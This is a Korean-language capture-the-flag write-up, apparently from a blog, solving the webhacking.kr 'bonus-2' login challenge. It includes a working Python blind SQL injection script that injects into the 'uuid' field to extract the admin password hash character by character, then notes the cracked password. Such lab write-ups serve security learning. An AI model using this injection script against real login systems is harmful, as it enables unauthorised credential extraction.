반응형
문제
로그인과 회원가입 기능이 존재한다.
문제풀이
guest/guest로 로그인하면 해시값을 확인할 수 있다.
md5 복호화 결과, guestapple임을 알 수 있고, 비밀번호+apple이 해시값으로 만들어지는 것을 알 수 있다.
import requests
url = 'https://webhacking.kr/challenge/bonus-2/index.php'
cookie = {'PHPSESSID':'bmvg2k4nh4momseflhkh18371h'}
pw_len = 0
for i in range(100):
params = {"uuid":"admin\' and length(pw)={}#".format(i),"pw":"123"}
res = requests.post(url, cookies = cookie, data = params)
if "Wrong password" in res.text:
pw_len = i
break
print("길이:{}".format(pw_len))
pw = ""
for i in range(pw_len + 1):
for j in range(32, 123):
params = {"uuid":"admin\' and ascii(substr(pw,{},1))={}#".format(i,j), "pw":"123"}
res = requests.post(url, cookies = cookie, data = params)
if "Wrong password" in res.text:
pw += chr(j)
print(pw)
break
print("해시값:{}".format(pw))
admin 계정의 해시값을 구하고 복호화하여 비밀번호가 "wow"임을 알 수 있다.
반응형
'write-up(web) > webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] old-28 (0) | 2023.11.02 |
|---|---|
| [Webhacking.kr] old-27 (0) | 2023.11.02 |
| [Webhacking.kr] old-21 (0) | 2023.11.02 |
| [Webhacking.kr] old-20 (0) | 2023.11.02 |
| [Webhacking.kr] old-19 (1) | 2023.11.02 |